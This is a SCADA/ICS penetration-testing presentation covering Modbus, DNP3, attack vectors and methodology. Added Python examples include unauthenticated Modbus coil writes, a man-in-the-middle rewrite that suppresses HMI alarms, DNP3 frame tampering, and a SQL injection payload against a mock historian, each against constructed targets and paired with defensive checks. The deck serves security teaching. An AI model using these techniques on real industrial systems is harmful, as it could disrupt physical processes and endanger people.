PENETRATION TESTING SCADA INDUSTRIAL
CONTROL SYSTEMS
By : Yehia Mamdouh
THIS PRESENTATION COVERS:
What is SCADA?
What is it used for?
What are the benefits of using SCADA?
SCADA system concept
How SCADA Communication Works?
SCADA Protocols
SCADA Cyber security
Types of SCADA Networks
Attack Vectors
Penetration testing methodology
Conclusion
WHAT IS A SCADA CONTROL SYSTEM?
* SCADA: Supervisory Control and Data Acquisition. A type of control system used to monitor
and control many different kinds of equipment in many different kinds of environments.
* In general, the term refers to a class of industrial control system (ICS).
WHERE IS SCADA USED?
* Electric power generation, transmission, and distribution
* Water and sewage
* Buildings, facilities, and environments
* Manufacturing
* Mass transit
* Traffic signals.
BENEFITS OF SCADA
Used for:
1- Transmitting individual device status
2- Managing energy consumption by controlling the devices
3- Allowing direct control of power system equipment
4- Controlling chemical plant processes, oil and gas pipelines, electrical generation and transmission
equipment, manufacturing facilities, etc.
Examples of controlled equipment: motors, valves, pumps, relays, etc.
Benefits:
1- Identify and solve problems before they start.
2- Keep an eye on long-term trends and threats.
3- Identify and attack bottlenecks and inefficiencies throughout the enterprise.
4- Effectively manage bigger and more complicated processes with a smaller staff.
SCADA SYSTEM CONCEPT
SCADA workstation: the central SCADA console from which a human operator issues commands,
receives data in human-readable form, and monitors and controls the process.
HMI (Human-Machine Interface): the software and hardware that lets the human operator monitor the state
of the process under control, modify control settings and manually override automatic control. It sits
between the human operator and the commands relevant to the SCADA system.
(Runs on Windows, Linux or Unix.)
SCADA SYSTEM CONCEPT
Data historian: collects and stores data from mission-critical systems so it can be retrieved and
analysed accurately (usually an SQL database).
SCADA server / MTU (Master Terminal Unit): issues commands to the Remote Terminal Units (RTUs)
located at sites remote from the control centre, gathers the required data, stores it, processes it
and displays it.
RTU (Remote Terminal Unit): connects to sensors on the process, converts the sensor signals and sends
digital data to the supervisory system.
PLC (Programmable Logic Controller): automatically performs the main site control process, i.e. controls
the operation of industrial equipment such as machinery.
HOW SCADA COMMUNICATION WORKS
* The control operator or workstation monitors the data and initiates control commands through the HMI.
* HMIs are traditionally applications installed on workstations running Windows or Linux, and more
recently web applications. These HMIs talk to the SCADA controlling server.
* The SCADA controlling server keeps collected data in the data historian, which is basically a database
that the SCADA server pushes data to and, in some cases, pulls data from.
* The SCADA server sends the appropriate signal to the correct RTU or PLC.
* The RTU or PLC consults its pre-programmed logic to determine what to do with this control signal and
drives the industrial equipment accordingly.
* Equipment examples: relays, capacitor banks, feeder switches, actuators.
[Diagram: System concept of SCADA. Field sensors (temperature level, pressure level, oil level, alarm,
radioactivity level) feed the RTU/PLC; RTU/PLCs talk to the SCADA server over Modbus TCP/IP or DNP3,
across a wide area network through a communication router; the SCADA server feeds the data historian,
the HMI (web interface) and the workstation.]
SCADA PROTOCOLS
* We have mentioned that the SCADA server sends signals to the RTU or PLC and vice versa.
How can the central SCADA console receive information from sensors, which are very simple devices?
This is where SCADA protocols come in.
* The RTU collects data from sensors and converts the readings into a protocol, such as Modbus or
DNP3, that can be transported across your communications network and back to you.
DNP3 (Distributed Network Protocol): used for communication between the master station and RTUs.
TCP/UDP port 20000.
Modbus: typically used for SCADA-style communication between devices; implementations exist over serial
lines (Modbus RTU/ASCII) and over TCP/IP (Modbus/TCP). Standard TCP port 502.
WHY SECURITY IS IMPORTANT IN
CONTROL SYSTEMS?
Why?
* Gaining access to networked control systems can be easy for an intruder.
* More efficient communication = new risks, and in a control system the consequence can be a disaster.
* Control systems share the common vulnerabilities of traditional information technology.
* Control systems have recently adopted web technology, which is an attractive target for cyber attacks.
* Insecure protocols carry the data, several of them directly over TCP/IP.
* Control systems have moved to Windows and Linux, which have known vulnerabilities.
WHY SECURITY IS IMPORTANT IN
CONTROL SYSTEMS?
* The new protocols and communication standards that provide the increased connectivity and
interoperability are the same technologies that have been exploited and compromised in the Internet
and networking domains.
[Figure: a Modbus/TCP request packet. Annotation: no authentication, no encryption, no security.]
Consequences: attacks on field devices, database attacks, communications hijacking and
man-in-the-middle attacks, vulnerabilities in common protocols.
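To make the "no authentication, no encryption" point concrete, here is an added example (mine, not from the slides) of the Modbus/TCP wire format from both sides: a client that builds Read Holding Registers and Write Single Coil requests, and a constructed in-memory PLC that answers them on a localhost port. Every value, register and coil is made up for the demo. The point to notice is that there is no field in the frame a device could check a credential against: whoever can open a TCP connection to port 502 can read the process image and flip outputs.

```python
import socket
import struct
import threading

# Constructed in-memory "PLC" for the demo: 16 coils and 8 holding registers.
# The register values are made up; nothing here comes from a real device.
COILS = [False] * 16
HOLDING = [0, 120, 3350, 0, 0, 0, 0, 0]

MBAP = ">HHHB"   # transaction id, protocol id (0 = Modbus), length, unit id


def frame(tid, unit, pdu):
    """Prefix a PDU with the 7-byte MBAP header; the length field counts unit id + PDU."""
    return struct.pack(MBAP, tid, 0, len(pdu) + 1, unit) + pdu


def read_holding_request(tid, unit, addr, qty):
    """Function 0x03 Read Holding Registers: start address and quantity. No credential field exists."""
    return frame(tid, unit, struct.pack(">BHH", 0x03, addr, qty))


def write_coil_request(tid, unit, addr, on):
    """Function 0x05 Write Single Coil: 0xFF00 switches the coil on, 0x0000 off."""
    return frame(tid, unit, struct.pack(">BHH", 0x05, addr, 0xFF00 if on else 0x0000))


def plc_handle(request):
    """Device side: act on any well-formed frame. The protocol gives the device nothing to authenticate."""
    tid, _proto, length, unit = struct.unpack(MBAP, request[:7])
    pdu = request[7:7 + length - 1]
    fc = pdu[0]
    if fc == 0x03:
        addr, qty = struct.unpack(">HH", pdu[1:5])
        if addr + qty > len(HOLDING):
            return frame(tid, unit, bytes([fc | 0x80, 0x02]))      # exception 02: illegal data address
        data = struct.pack(">%dH" % qty, *HOLDING[addr:addr + qty])
        return frame(tid, unit, bytes([fc, len(data)]) + data)
    if fc == 0x05:
        addr, value = struct.unpack(">HH", pdu[1:5])
        COILS[addr] = value == 0xFF00
        return frame(tid, unit, pdu)                                 # normal response echoes the request
    return frame(tid, unit, bytes([fc | 0x80, 0x01]))               # exception 01: illegal function


def parse_response(response):
    """Return (transaction id, function code, payload); raise on an exception response."""
    tid, _proto, length, _unit = struct.unpack(MBAP, response[:7])
    pdu = response[7:7 + length - 1]
    if pdu[0] & 0x80:
        raise ValueError("Modbus exception 0x%02x for function 0x%02x" % (pdu[1], pdu[0] & 0x7F))
    if pdu[0] == 0x03:
        count = pdu[1]
        return tid, 0x03, list(struct.unpack(">%dH" % (count // 2), pdu[2:2 + count]))
    return tid, pdu[0], pdu[1:]


def recv_frame(sock):
    """Read exactly one Modbus/TCP frame: the 7-byte header, then as many bytes as it announces."""
    buf = b""
    while len(buf) < 7:
        chunk = sock.recv(7 - len(buf))
        if not chunk:
            return b""
        buf += chunk
    need = struct.unpack(">H", buf[4:6])[0] - 1
    while need > 0:
        chunk = sock.recv(need)
        if not chunk:
            return b""
        buf += chunk
        need -= len(chunk)
    return buf


def serve_one_client(listener):
    conn, _ = listener.accept()
    with conn:
        while True:
            request = recv_frame(conn)
            if not request:
                return
            conn.sendall(plc_handle(request))


def run_demo():
    """Start the fake PLC on an ephemeral localhost port, then talk to it as any host on the segment could."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    threading.Thread(target=serve_one_client, args=(listener,), daemon=True).start()
    with socket.create_connection(listener.getsockname()) as s:
        s.sendall(read_holding_request(1, 1, 1, 2))
        _, _, regs = parse_response(recv_frame(s))
        s.sendall(write_coil_request(2, 1, 3, True))      # e.g. start a pump: no login, no signature
        tid, fc, _ = parse_response(recv_frame(s))
    listener.close()
    return {"registers": regs, "write_tid": tid, "write_fc": fc, "coil3": COILS[3]}


if __name__ == "__main__":
    print(run_demo())
```

Run it and you get the two registers back and the coil write acknowledged with an echo of the request. On a real segment the same bytes work against a real PLC, which is why written scope and a test rig matter: a write to the wrong coil is a physical action, not a log entry.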
REAL ATTACKS
Security incidents in control systems have been reported for years.
TYPES OF SCADA NETWORKS
Early or monolithic SCADA systems
* The first SCADA systems held all operations in one computer, usually a mainframe.
* There was little control exercised; most early SCADA functions were limited to monitoring sensors and
flagging abnormal operations.
* Limited to a single plant or facility. Like the software, SCADA hardware from one vendor was rarely
usable in another vendor's SCADA system.
TYPES OF SCADA NETWORKS
Distributed SCADA systems
* Shared control functions across multiple smaller (usually PC) computers connected by local area
networks (LANs).
* Shared real-time information and often performed small control tasks in addition to alerting operators
to possible problems.
TYPES OF SCADA NETWORKS
Networked SCADA systems
* Current SCADA systems are usually networked.
* They communicate through wide area networks (WANs), over phone or data lines, and often transmit data
between nodes over Ethernet or fibre-optic connections.
* They make heavy use of Programmable Logic Controllers (PLCs) to monitor and make routine process adjustments.
* The hardware tends to be more interchangeable, as PLC and other sub-unit vendors have standardised
communications and other protocols to allow the user to choose the best component for their needs.
TYPES OF SCADA NETWORKS
Internet of Things (IoT)
* A data model defines the types of data that will be monitored and allows new types to be added quickly and
easily as new smart objects are added to the process.
* Allows combinations of smart things/objects and sensor network technologies.
* Communication brings physical business benefits such as high-resolution management of resources and products,
better collaboration between enterprises and improved life-cycle management.
ATTACK VECTORS
* SCADA systems are vulnerable to the same threats as any TCP/IP-based system.
* SCADA administrators and industrial systems analysts are deceived into thinking that since their industrial
networks are separate systems, they are safe from outside attacks.
* PLCs and RTUs are usually polled over third-party, vendor-specific networks and protocols such as Modbus
and DNP3, usually carried over phone lines, leased private frame relay circuits or satellite links.
* Security in an industrial network can be compromised in many places along the system and is most
easily compromised at the SCADA host or control room level.
SCADA attacks: how far can they go?
ATTACK VECTORS
++ Once the corporate network is compromised, any IP-based device or computer system can be accessed.
++ 24/7 connectivity gives an opportunity to attack the SCADA host system, which can be used to:
* Mount a denial of service (DoS) attack to crash the SCADA server, leading to a shutdown condition
* Delete system files on the SCADA server (system downtime and loss of operations)
* Plant a Trojan and take complete control of the system
* Log company-sensitive operational data for personal use or for a competitor
Attack vectors that should be addressed:
1- Backdoors and holes in the network perimeter
2- Vulnerabilities in common protocols
3- Attacks on field devices
4- Database attacks
5- Communications hijacking and man-in-the-middle attacks
ATTACK VECTORS: Backdoors and holes in the network perimeter
1- Modern networks in the control system arena often have inherent capabilities that are deployed without
sufficient security analysis and can provide access to attackers once they are discovered.
2- Network components bring their own technologies, which often include firewalls, public-facing services
and wireless access; each of these components often has associated security vulnerabilities.
3- Remotely located control system elements can be reached through remote communications links. If the
systems are based on commercial operating systems, the attacks can be DDoS, privilege escalation
exploits or Trojan horses.
ATTACK VECTORS: Backdoors and holes in the network perimeter
4- Organisations in many CI/KR sectors provide data to customers and providers through publicly accessible
services, for example load expectation calculations or billing futures information. As these services are in
the public domain, they are often reachable from the Internet with little or no restriction on user access.
5- If the relationship between the firewall and the web server is not deployed correctly, unauthorised data
can flow from the external side into the internal domain. If the attacker compromises the trusted web
server, the attacker has a channel into the internal services (or control systems) LAN.
ATTACK VECTORS: Attacks using common protocols
1- Windows XP, a platform commonly used in control systems, has well-known security issues.
2- Control systems and modern networking technologies come with inherited security vulnerabilities. Even
though many of these vulnerabilities have solutions and available workarounds, deploying these
mitigations in control system architectures is not always feasible.
ATTACK VECTORS: Attacks into the control system via field devices
1- Control system architectures usually provide remote access to terminal end points and devices in a
number of ways, including by telephone or dedicated lines, to allow collection of operational and
maintenance data.
2- Modern equipment has embedded file servers and web servers to facilitate rich communications. These
devices are part of an internal, trusted domain, so access to them can give an attacker an
unauthorised vector into the control system architecture.
3- RTUs are an extension of the control domain, so attackers can add these field devices to their list of
viable targets to be investigated during the reconnaissance and scanning phases of an attack.
4- If a device is compromised, the attacker can leverage control over the device and escalate privileges.
ATTACK VECTORS: Database and SQL injection attacks
1- Database applications have become core components of control systems and their associated
record-keeping utilities.
2- Databases used by control systems are often connected to databases on the business network, and most
use SQL. The information they contain makes them high-value targets for any attacker.
3- Attackers can exploit the communication channel between the two networks and bypass the security
mechanisms that protect the control system environment.
4- Corrupted database content can affect data acquisition servers, historians and even the operator HMI
console, because control systems rely so heavily on data accuracy and integrity.
ATTACK VECTORS: Man-in-the-middle attacks
1- The ingredients are the ability to re-route data in transit on a network, the ability to capture and analyse
critical traffic that is in plaintext, and the ability to reverse engineer any proprietary protocol to gain command
over control communications.
2- Combining all of these, the MITM attack is executed.
3- As the attack is on the control domain, this plaintext traffic can be harvested (sniffed) and taken offline for
analysis and review.
4- Using ARP poisoning and collecting traffic, the attacker can establish and maintain complete control over
the communications in the network, for example preventing the HMI from issuing alarms.
5- The MITM can sit between the HMI and the RTU because of weak protocols such as Modbus.
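As an added illustration of point 4 above (mine, not part of the original deck), the first function below is the rewrite an attacker in the middle applies to each Read Holding Registers reply so the HMI never sees a value above its alarm threshold; the threshold, the register values and the transaction are all constructed. Because the attacker position itself (ARP poisoning) needs raw sockets and a live network, the example models only the payload rewrite. The second function is the defensive check a practitioner would pair with it: compare the HMI's view against an independent reading of the same registers.

```python
import struct

ALARM_HIGH = 3000   # constructed: the HMI raises an alarm when a register exceeds this value


def clamp_read_response(response, limit=ALARM_HIGH):
    """Rewrite a Read Holding Registers (0x03) reply so no register value exceeds `limit`.
    Returns (frame to forward, [(index, original, forged), ...]). Anything else passes through untouched."""
    if len(response) < 9:
        return response, []
    _tid, proto, _length, _unit = struct.unpack(">HHHB", response[:7])
    fc, byte_count = response[7], response[8]
    if proto != 0 or fc != 0x03 or len(response) != 9 + byte_count:
        return response, []
    regs = list(struct.unpack(">%dH" % (byte_count // 2), response[9:]))
    changes = []
    for i, value in enumerate(regs):
        if value > limit:
            changes.append((i, value, limit - 1))
            regs[i] = limit - 1
    # Modbus/TCP carries no checksum, MAC, nonce or sequence secret of its own, so the MBAP header is
    # reused as-is. A transparent proxy simply re-sends the bytes on its own TCP connection and the HMI
    # has no way to tell this reply from the genuine one.
    return response[:9] + struct.pack(">%dH" % len(regs), *regs), changes


def detect_by_consistency(hmi_values, reference_values, tolerance=5):
    """Defensive check for the same attack: compare the values the HMI displays with the values an
    independent path records (a historian polling the PLC over a separate link, or a serial tap).
    A mismatch larger than `tolerance` means one of the two paths is lying."""
    return [(i, a, b) for i, (a, b) in enumerate(zip(hmi_values, reference_values))
            if abs(a - b) > tolerance]


# Constructed sample: reply to a read of 3 registers, unit 1, transaction 7, values 120, 3350, 42.
# 3350 is above ALARM_HIGH and would trip the alarm if the HMI ever saw it.
SAMPLE_REPLY = bytes.fromhex("0007" "0000" "0009" "01" "03" "06" "0078" "0d16" "002a")

if __name__ == "__main__":
    forged, changes = clamp_read_response(SAMPLE_REPLY)
    print(forged.hex(), changes)
    print(detect_by_consistency([120, 2999, 42], [120, 3350, 42]))
```

The rewritten frame is byte-for-byte the same length and keeps the original transaction id, so neither the HMI's request/response matching nor any length check notices. The only thing that does is an out-of-band comparison, which is why a historian or alarm path that does not share the HMI's network route is worth the extra cabling.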
PENETRATION TESTING METHODOLOGY
The penetration testing methodology we use in control systems is like normal network penetration testing.
How?
* We are dealing with devices, operating systems (Windows, Linux), protocols over TCP, applications and
SQL databases, and firewalls.
Audit identification
Devices and networks:
router configs, routing tables, switch tables, physical cable checks, packet sniffing
Services:
local port verification (netstat)
Vulnerabilities:
local banner grabbing
Perimeter:
identify all external connections
* Review firewall rules
* Review remote access methods
* Check for wireless networks
* Check physical access
PENETRATION TESTING METHODOLOGY
Network infrastructure
Review router configs
Review switch tables
Conduct physical cable checks
Conduct packet sniffing and analysis
Host operating systems
Review patch level
Review password quality
Review share and directory permissions
Review remote access
Applications
Review ports and services
Review OS credentials
Review remote access
Consider code review
PLCs, RTUs, etc.
Review patch levels
Review password quality
Conduct packet sniffing
PENETRATION TESTING METHODOLOGY
Scanning / discovery
Some available tools:
plcscan - scans Modbus and Siemens S7 devices
modscan - scans Modbus devices
Nmap (be careful: a single Nmap scan can crash a PLC; scan slowly, limit the scan to the ports you need
and never run version or script scans blind against production equipment)
Metasploit modules for Modbus detection
* Most PLCs (communication modules) cannot filter on source IP address, so anyone who can reach the port
can talk to them. Depending on the vendor protocol, that lets us:
Crack captured credentials offline with Python scripts or John the Ripper
Brute-force the PLC password online
Enumerate supported devices and stations
Change station names
Change IP address, netmask and gateway
Request full network information
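An added example of what the discovery tools above send, written for this page rather than taken from any of those tools: one Modbus Read Device Identification request (function 0x2B, MEI type 0x0E), the parser for its reply, and a one-shot `identify()` that asks a host exactly once with a short timeout. The sample reply is constructed, not captured from a real device. Fragile PLC stacks are why the probe is one small request rather than a port sweep; plcscan, Nmap's modbus-discover script and Metasploit's auxiliary/scanner/scada/modbusdetect module likewise rely on small, targeted Modbus queries.

```python
import socket
import struct


def device_id_request(tid=1, unit=1, read_code=0x01, object_id=0x00):
    """Function 0x2B / MEI 0x0E Read Device Identification.
    read_code 1 asks for the basic objects (vendor, product code, revision) starting at object_id."""
    pdu = struct.pack(">BBBB", 0x2B, 0x0E, read_code, object_id)
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


OBJECT_NAMES = {0: "VendorName", 1: "ProductCode", 2: "MajorMinorRevision",
                3: "VendorUrl", 4: "ProductName", 5: "ModelName", 6: "UserApplicationName"}


def parse_device_id(response):
    """Return ({object name: value}, more_follows) from a 0x2B/0x0E reply; raise on anything else."""
    _tid, _proto, length, _unit = struct.unpack(">HHHB", response[:7])
    pdu = response[7:7 + length - 1]
    if pdu[0] == 0xAB:                                   # 0x2B | 0x80: exception response
        raise ValueError("device refused Read Device Identification (exception 0x%02x)" % pdu[1])
    if pdu[:2] != b"\x2B\x0E":
        raise ValueError("not a Read Device Identification response")
    _read_code, _conformity, more_follows, _next_id, count = pdu[2:7]
    objects, pos = {}, 7
    for _ in range(count):                               # each object: id, length, value bytes
        obj_id, obj_len = pdu[pos], pdu[pos + 1]
        value = pdu[pos + 2:pos + 2 + obj_len].decode("ascii", "replace")
        objects[OBJECT_NAMES.get(obj_id, "Object%d" % obj_id)] = value
        pos += 2 + obj_len
    return objects, more_follows == 0xFF


def identify(host, port=502, unit=1, timeout=2.0):
    """Identify one device with a single request: one connection, one query, a short timeout.
    Not a sweep; run it per host, with the asset owner watching the process."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(device_id_request(unit=unit))
        header = s.recv(7)
        length = struct.unpack(">H", header[4:6])[0]
        body = s.recv(length - 1)
    return parse_device_id(header + body)


# Constructed reply (not from a real device): basic objects VendorName, ProductCode, revision.
SAMPLE_RESPONSE = bytes.fromhex(
    "0001" "0000" "001a" "01"             # MBAP: tid 1, protocol 0, length 26, unit 1
    "2b0e" "01" "01" "00" "00" "03"       # MEI 0x0E, basic, conformity 1, no more follows, next 0, 3 objects
    "00" "04" + b"Acme".hex()
    + "01" "04" + b"PLC1".hex()
    + "02" "04" + b"v1.0".hex())

if __name__ == "__main__":
    print(device_id_request().hex())
    print(parse_device_id(SAMPLE_RESPONSE))
```

Devices that implement only the "basic" category answer with the three objects shown; ones that do not implement function 0x2B at all answer with exception 01 (illegal function), which is itself a fingerprint worth recording. Either way the exchange is one request and one reply, which is the pace to keep on a live network.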
PENETRATION TESTING METHODOLOGY
Analyse protocols
How do the protocols live on the network?
Not blocked by firewalls/switches
Accessible between LAN segments
Work from the data link layer up to the application layer
Easy to detect
Easy to analyse
So, with the available tools, we can:
detect devices and their protocols
monitor state and commands
inject or modify reply packets in real time
Sniffing traffic:
Wireshark
tcpdump
Python
hex viewer
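Sniffing with tcpdump or Wireshark produces a pcap; the Python analysis step is shown here as an added example (mine, not from the deck). It reads a pcap from memory, strips Ethernet/IPv4/TCP, counts Modbus/TCP function codes per client/server pair and flags write functions coming from any client not on a list of known masters. The three packets are constructed with the helper at the bottom so the block runs offline; the IP addresses and the master list are assumptions.

```python
import struct

PCAP_MAGIC = 0xA1B2C3D4


def pcap_packets(blob):
    """Yield raw link-layer frames from an in-memory pcap file (the format tcpdump -w writes)."""
    magic, = struct.unpack("<I", blob[:4])
    endian = "<" if magic == PCAP_MAGIC else ">"   # magic read in file order reveals the byte order
    pos = 24                                      # global header: magic, version, zone, sigfigs, snaplen, linktype
    while pos + 16 <= len(blob):
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + "IIII", blob[pos:pos + 16])
        pos += 16
        yield blob[pos:pos + incl_len]
        pos += incl_len


def tcp_payload(frame):
    """Ethernet II / IPv4 / TCP decapsulation: (src_ip, dst_ip, sport, dport, payload) or None."""
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:                                 # protocol field: 6 = TCP
        return None
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    return src, dst, sport, dport, ip[ihl + data_off:total_len]


MODBUS_FC = {1: "Read Coils", 2: "Read Discrete Inputs", 3: "Read Holding Registers",
             4: "Read Input Registers", 5: "Write Single Coil", 6: "Write Single Register",
             8: "Diagnostics", 15: "Write Multiple Coils", 16: "Write Multiple Registers",
             43: "Encapsulated Interface Transport"}
WRITE_FC = {5, 6, 15, 16}


def summarize_modbus(blob, known_masters):
    """Count Modbus/TCP request function codes per (client, server) and flag writes from unknown clients."""
    counts, alerts = {}, []
    for frame in pcap_packets(blob):
        parsed = tcp_payload(frame)
        if parsed is None:
            continue
        src, dst, _sport, dport, payload = parsed
        if dport != 502 or len(payload) < 8:
            continue                               # requests only: client -> server port 502
        fc = payload[7]                            # function code follows the 7-byte MBAP header
        key = (src, dst)
        counts.setdefault(key, {})
        counts[key][fc] = counts[key].get(fc, 0) + 1
        if fc in WRITE_FC and src not in known_masters:
            alerts.append((src, dst, MODBUS_FC.get(fc, "fc %d" % fc)))
    return counts, alerts


def make_frame(src_ip, dst_ip, sport, dport, payload):
    """Build a constructed Ethernet/IPv4/TCP frame; checksums are zero, which pcap readers ignore."""
    ip_len = 20 + 20 + len(payload)
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, ip_len, 0, 0, 64, 6, 0,
                     bytes(int(x) for x in src_ip.split(".")), bytes(int(x) for x in dst_ip.split(".")))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def make_pcap(frames):
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)   # linktype 1 = Ethernet
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
    return out


# Constructed capture: the HMI (10.0.0.10) reads two registers from the PLC (10.0.1.5), the PLC
# answers, then an unknown host (10.0.0.99) writes a coil on the same PLC.
SAMPLE_PCAP = make_pcap([
    make_frame("10.0.0.10", "10.0.1.5", 40001, 502, bytes.fromhex("000100000006010300000002")),
    make_frame("10.0.1.5", "10.0.0.10", 502, 40001, bytes.fromhex("00010000000701030400780d16")),
    make_frame("10.0.0.99", "10.0.1.5", 51000, 502, bytes.fromhex("00020000000601050003ff00")),
])

if __name__ == "__main__":
    print(summarize_modbus(SAMPLE_PCAP, known_masters={"10.0.0.10"}))
```

The same function-code table is what you would load into a span-port monitor: reads from the HMI are the baseline, and any write, diagnostic (0x08) or encapsulated (0x2B) request from an address that is not a known master is the event to alert on. Feed it a real file with `open("capture.pcap", "rb").read()`.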
PENETRATION TESTING METHODOLOGY
Analyse protocols
Modbus
The web interface is often the easiest way in: around 80% of Modbus/TCP devices have web interfaces, and
other research shows most of those devices run Windows 2000.
DNP3
* Has source and destination addresses that are useful in man-in-the-middle attacks, for example to:
1- Turn off unsolicited reporting to stifle alarms
2- Issue unauthorised stops, restarts or other functions that could disrupt specific operations
* Implementations typically do not employ encryption, authentication or authorisation; DNP3 devices simply
assume that all messages are valid.
PENETRATION TESTING METHODOLOGY
Analyse protocols
DNP3
Passive network reconnaissance
With appropriate access, capture and analyse DNP3 messages. This reveals the network topology and
device functionality.
Rogue test
Install a man-in-the-middle device between the master and the outstations that can read, modify and
fabricate DNP3 messages and/or network traffic.
Other attacks on the data link and application layers
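As an added example (not from the slides) of why "DNP3 devices simply assume that all messages are valid", the block below builds and verifies DNP3 data link frames, including the CRC-16/DNP the standard places after the 8-byte header and after every 16-byte block of user data, and then shows the rogue device of the previous slide re-stamping a modified frame. Addresses, control bits and user data are constructed. The CRC only proves the frame was not damaged in transit; with no key involved, anyone who can send bytes can also compute it.

```python
import struct

START = b"\x05\x64"   # every DNP3 data link frame begins with these two bytes


def crc_dnp(data):
    """CRC-16/DNP: polynomial 0x3D65 (bit-reflected 0xA6BC), init 0, final ones-complement."""
    crc = 0
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA6BC if crc & 1 else crc >> 1
    return crc ^ 0xFFFF


def control_byte(dir_bit, prm, fcb, fcv, function):
    """DIR (bit 7), PRM (bit 6), FCB (bit 5), FCV (bit 4), link function code (bits 0-3)."""
    return (dir_bit << 7) | (prm << 6) | (fcb << 5) | (fcv << 4) | (function & 0x0F)


def build_frame(control, dest, src, user_data=b""):
    """Start, length, control, destination, source, header CRC, then user data in blocks of up to
    16 bytes, each followed by its own CRC. Addresses and CRCs are little-endian on the wire."""
    length = 5 + len(user_data)               # control + dest + src + user data; CRCs are not counted
    header = START + struct.pack("<BBHH", length, control, dest, src)
    out = header + struct.pack("<H", crc_dnp(header))
    for i in range(0, len(user_data), 16):
        block = user_data[i:i + 16]
        out += block + struct.pack("<H", crc_dnp(block))
    return out


def parse_frame(raw):
    """Check every CRC and return (control, dest, src, user_data); a mismatch raises."""
    if raw[:2] != START:
        raise ValueError("bad start bytes")
    length, control, dest, src = struct.unpack("<BBHH", raw[2:8])
    if crc_dnp(raw[:8]) != struct.unpack("<H", raw[8:10])[0]:
        raise ValueError("header CRC mismatch")
    user_data, pos, remaining = b"", 10, length - 5
    while remaining > 0:
        n = min(16, remaining)
        block = raw[pos:pos + n]
        if crc_dnp(block) != struct.unpack("<H", raw[pos + n:pos + n + 2])[0]:
            raise ValueError("data block CRC mismatch")
        user_data += block
        pos += n + 2
        remaining -= n
    return control, dest, src, user_data


def tamper(raw, new_src):
    """What the rogue device does: change a field, recompute the CRCs, forward. The outstation accepts
    the result because a CRC catches line noise, not an adversary who knows the polynomial."""
    control, dest, _src, data = parse_frame(raw)
    return build_frame(control, dest, new_src, data)


if __name__ == "__main__":
    # master (DIR=1, PRM=1) -> outstation 1 from source 4, function 0 = RESET_LINK_STATES
    reset = build_frame(control_byte(1, 1, 0, 0, 0), 1, 4)
    print(reset.hex())
    print(parse_frame(tamper(reset, 99)))
```

On the wire the two CRC bytes follow the header least-significant byte first, which is the `<H` packing above. A receiver that wants to know the frame really came from source 4 has to look beyond the data link layer: DNP3 Secure Authentication (IEEE 1815) adds a keyed MAC at the application layer precisely because nothing at this layer can.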
PENETRATION TESTING METHODOLOGY
Data manipulation
Web application testing and SQL injection
* As SCADA uses web applications on the HMI and SQL in the database, we can test both for vulnerabilities.
Available tools:
Modlib - Scapy extension [Python]
OpenDNP3 - library [C++]
Metasploit modules
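The tag lookup on the HMI web page is the usual injection point into the historian, so here is an added example (mine, not from any SCADA product) covering the database attack slide and this one: an in-memory SQLite "historian" with a tag table the HMI is meant to query and a setpoint table it is not, the vulnerable string-formatted query, the payload that reads the setpoints through it, and the parameterised version that defeats the same payload. All table names, tags and values are constructed.

```python
import sqlite3


def build_historian():
    """Constructed sample historian: process tags readable by the HMI page, plus a setpoint table
    that the page has no business exposing. Not a real product schema."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tags(name TEXT, value REAL, unit TEXT);
        INSERT INTO tags VALUES ('Pump1_Pressure', 3350, 'kPa'), ('Tank2_Level', 61.5, '%');
        CREATE TABLE setpoints(name TEXT, value REAL);
        INSERT INTO setpoints VALUES ('Pump1_Trip_High', 3600), ('Tank2_Low_Alarm', 20);
    """)
    return db


def tag_lookup_vulnerable(db, tag_name):
    """The pattern to look for in an HMI web page: the user-controlled tag name is pasted into the SQL."""
    query = "SELECT name, value, unit FROM tags WHERE name = '%s'" % tag_name
    return db.execute(query).fetchall()


def tag_lookup_fixed(db, tag_name):
    """Same query with a bound parameter: the input is data and can never become SQL."""
    return db.execute("SELECT name, value, unit FROM tags WHERE name = ?", (tag_name,)).fetchall()


# Constructed payload: close the string, UNION in rows from the setpoint table with a matching
# column count, then comment out the trailing quote the template appends.
PAYLOAD = "x' UNION SELECT name, value, 'setpoint' FROM setpoints -- "


def demo():
    db = build_historian()
    return {
        "normal": tag_lookup_vulnerable(db, "Tank2_Level"),
        "injected": tag_lookup_vulnerable(db, PAYLOAD),
        "fixed_with_payload": tag_lookup_fixed(db, PAYLOAD),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

Reading setpoints is the quiet outcome; on a database account with write rights the same hole turns into a stacked `UPDATE setpoints ...`, which is the integrity failure the database attack slide warns about and the reason the HMI's database login should be read-only and scoped to the tables the page needs.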
Conclusion
SCADA SECURITY
Creating demilitarised zones (DMZs)
Multiple DMZs can be created for separate functions and access privileges, such as peer connections,
the data historian and the Inter-Control Center Communications Protocol (ICCP) server in SCADA systems.
Firewalls
Properly configured and coordinated, firewalls can protect passwords, IP addresses, files and more.
Proxy servers
A proxy server is an Internet server that acts as a firewall, mediating traffic between a protected network and
the Internet.
The security policy
Effective security policies and procedures are the first step to a secure control system network. Many of
the same policies
Security training
Security training for the staff who work in the facility is essential for preventing physical and social
engineering attacks.
SCADA SECURITY
1- Identify all connections to the SCADA network.
2- Disconnect unnecessary connections to the SCADA network.
3- Remove or disable unnecessary services.
4- Implement internal and external IDS and establish 24-hour incident monitoring.
